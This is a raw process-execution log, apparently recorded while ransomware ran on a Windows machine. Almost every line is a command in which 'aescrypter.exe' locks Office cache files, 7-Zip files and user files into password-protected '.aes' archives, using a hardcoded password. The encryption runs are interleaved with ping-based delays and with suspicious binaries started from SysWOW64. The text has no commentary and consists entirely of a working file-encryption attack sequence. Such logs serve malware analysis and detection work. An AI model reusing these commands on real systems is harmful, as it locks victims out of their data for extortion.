"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\branding.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\OfficeMUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\branding.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml.aes" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Setup.xml" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\History.txt.aes" "C:\Program Files\7-Zip\History.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\af.txt.aes" "C:\Program Files\7-Zip\Lang\af.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\an.txt.aes" "C:\Program Files\7-Zip\Lang\an.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ar.txt.aes" "C:\Program Files\7-Zip\Lang\ar.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ast.txt.aes" "C:\Program Files\7-Zip\Lang\ast.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\az.txt.aes" "C:\Program Files\7-Zip\Lang\az.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ba.txt.aes" "C:\Program Files\7-Zip\Lang\ba.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\be.txt.aes" "C:\Program Files\7-Zip\Lang\be.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\bg.txt.aes" "C:\Program Files\7-Zip\Lang\bg.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\bn.txt.aes" "C:\Program Files\7-Zip\Lang\bn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\br.txt.aes" "C:\Program Files\7-Zip\Lang\br.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ca.txt.aes" "C:\Program Files\7-Zip\Lang\ca.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\co.txt.aes" "C:\Program Files\7-Zip\Lang\co.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\cs.txt.aes" "C:\Program Files\7-Zip\Lang\cs.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\cy.txt.aes" "C:\Program Files\7-Zip\Lang\cy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\da.txt.aes" "C:\Program Files\7-Zip\Lang\da.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\de.txt.aes" "C:\Program Files\7-Zip\Lang\de.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\el.txt.aes" "C:\Program Files\7-Zip\Lang\el.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\eo.txt.aes" "C:\Program Files\7-Zip\Lang\eo.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\es.txt.aes" "C:\Program Files\7-Zip\Lang\es.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\et.txt.aes" "C:\Program Files\7-Zip\Lang\et.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\eu.txt.aes" "C:\Program Files\7-Zip\Lang\eu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ext.txt.aes" "C:\Program Files\7-Zip\Lang\ext.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fa.txt.aes" "C:\Program Files\7-Zip\Lang\fa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fi.txt.aes" "C:\Program Files\7-Zip\Lang\fi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\PING.EXE
"C:\Windows\System32\PING.EXE" -n 1 -w 1000 11.11.11.11 >nul
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fr.txt.aes" "C:\Program Files\7-Zip\Lang\fr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fur.txt.aes" "C:\Program Files\7-Zip\Lang\fur.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\fy.txt.aes" "C:\Program Files\7-Zip\Lang\fy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ga.txt.aes" "C:\Program Files\7-Zip\Lang\ga.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\gl.txt.aes" "C:\Program Files\7-Zip\Lang\gl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\gu.txt.aes" "C:\Program Files\7-Zip\Lang\gu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\he.txt.aes" "C:\Program Files\7-Zip\Lang\he.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hi.txt.aes" "C:\Program Files\7-Zip\Lang\hi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hr.txt.aes" "C:\Program Files\7-Zip\Lang\hr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\dcomcnfgui.exe
"C:\Windows\system32\dcomcnfgui.exe" -s
C:\Windows\SysWOW64\ucsvcsh.exe
"C:\Windows\system32\ucsvcsh.exe" -s
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hu.txt.aes" "C:\Program Files\7-Zip\Lang\hu.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\hy.txt.aes" "C:\Program Files\7-Zip\Lang\hy.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\id.txt.aes" "C:\Program Files\7-Zip\Lang\id.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\io.txt.aes" "C:\Program Files\7-Zip\Lang\io.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\is.txt.aes" "C:\Program Files\7-Zip\Lang\is.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\it.txt.aes" "C:\Program Files\7-Zip\Lang\it.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ja.txt.aes" "C:\Program Files\7-Zip\Lang\ja.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ka.txt.aes" "C:\Program Files\7-Zip\Lang\ka.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kaa.txt.aes" "C:\Program Files\7-Zip\Lang\kaa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kab.txt.aes" "C:\Program Files\7-Zip\Lang\kab.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\Windows\SysWOW64\dcomcnfgui.exe
"C:\Windows\system32\dcomcnfgui.exe" -s
C:\Windows\SysWOW64\ucsvcsh.exe
"C:\Windows\system32\ucsvcsh.exe" -s
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\kk.txt.aes" "C:\Program Files\7-Zip\Lang\kk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ko.txt.aes" "C:\Program Files\7-Zip\Lang\ko.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ku-ckb.txt.aes" "C:\Program Files\7-Zip\Lang\ku-ckb.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ku.txt.aes" "C:\Program Files\7-Zip\Lang\ku.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ky.txt.aes" "C:\Program Files\7-Zip\Lang\ky.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lij.txt.aes" "C:\Program Files\7-Zip\Lang\lij.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lt.txt.aes" "C:\Program Files\7-Zip\Lang\lt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\lv.txt.aes" "C:\Program Files\7-Zip\Lang\lv.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mk.txt.aes" "C:\Program Files\7-Zip\Lang\mk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mn.txt.aes" "C:\Program Files\7-Zip\Lang\mn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mng.txt.aes" "C:\Program Files\7-Zip\Lang\mng.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mng2.txt.aes" "C:\Program Files\7-Zip\Lang\mng2.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\mr.txt.aes" "C:\Program Files\7-Zip\Lang\mr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ms.txt.aes" "C:\Program Files\7-Zip\Lang\ms.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nb.txt.aes" "C:\Program Files\7-Zip\Lang\nb.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ne.txt.aes" "C:\Program Files\7-Zip\Lang\ne.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nl.txt.aes" "C:\Program Files\7-Zip\Lang\nl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\nn.txt.aes" "C:\Program Files\7-Zip\Lang\nn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pa-in.txt.aes" "C:\Program Files\7-Zip\Lang\pa-in.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pl.txt.aes" "C:\Program Files\7-Zip\Lang\pl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ps.txt.aes" "C:\Program Files\7-Zip\Lang\ps.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pt-br.txt.aes" "C:\Program Files\7-Zip\Lang\pt-br.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\pt.txt.aes" "C:\Program Files\7-Zip\Lang\pt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ro.txt.aes" "C:\Program Files\7-Zip\Lang\ro.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ru.txt.aes" "C:\Program Files\7-Zip\Lang\ru.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sa.txt.aes" "C:\Program Files\7-Zip\Lang\sa.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\si.txt.aes" "C:\Program Files\7-Zip\Lang\si.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sk.txt.aes" "C:\Program Files\7-Zip\Lang\sk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sl.txt.aes" "C:\Program Files\7-Zip\Lang\sl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sq.txt.aes" "C:\Program Files\7-Zip\Lang\sq.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sr-spc.txt.aes" "C:\Program Files\7-Zip\Lang\sr-spc.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sr-spl.txt.aes" "C:\Program Files\7-Zip\Lang\sr-spl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sv.txt.aes" "C:\Program Files\7-Zip\Lang\sv.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\sw.txt.aes" "C:\Program Files\7-Zip\Lang\sw.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ta.txt.aes" "C:\Program Files\7-Zip\Lang\ta.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tg.txt.aes" "C:\Program Files\7-Zip\Lang\tg.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\th.txt.aes" "C:\Program Files\7-Zip\Lang\th.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tk.txt.aes" "C:\Program Files\7-Zip\Lang\tk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tr.txt.aes" "C:\Program Files\7-Zip\Lang\tr.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\tt.txt.aes" "C:\Program Files\7-Zip\Lang\tt.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\ug.txt.aes" "C:\Program Files\7-Zip\Lang\ug.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uk.txt.aes" "C:\Program Files\7-Zip\Lang\uk.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uz-cyrl.txt.aes" "C:\Program Files\7-Zip\Lang\uz-cyrl.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\uz.txt.aes" "C:\Program Files\7-Zip\Lang\uz.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\va.txt.aes" "C:\Program Files\7-Zip\Lang\va.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\vi.txt.aes" "C:\Program Files\7-Zip\Lang\vi.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\yo.txt.aes" "C:\Program Files\7-Zip\Lang\yo.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\zh-cn.txt.aes" "C:\Program Files\7-Zip\Lang\zh-cn.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\Lang\zh-tw.txt.aes" "C:\Program Files\7-Zip\Lang\zh-tw.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\License.txt.aes" "C:\Program Files\7-Zip\License.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\7-Zip\readme.txt.aes" "C:\Program Files\7-Zip\readme.txt" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\CompressReset.jpg.aes" "C:\Program Files\CompressReset.jpg" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
"\ProgramData\local\aescrypter.exe" a "C:\Program Files\CompressSearch.rtf.aes" "C:\Program Files\CompressSearch.rtf" -ep2 -hp1a2vn57b348741t92451sst0a391ba72 -m0 -y
C:\ProgramData\local\aescrypter.exe
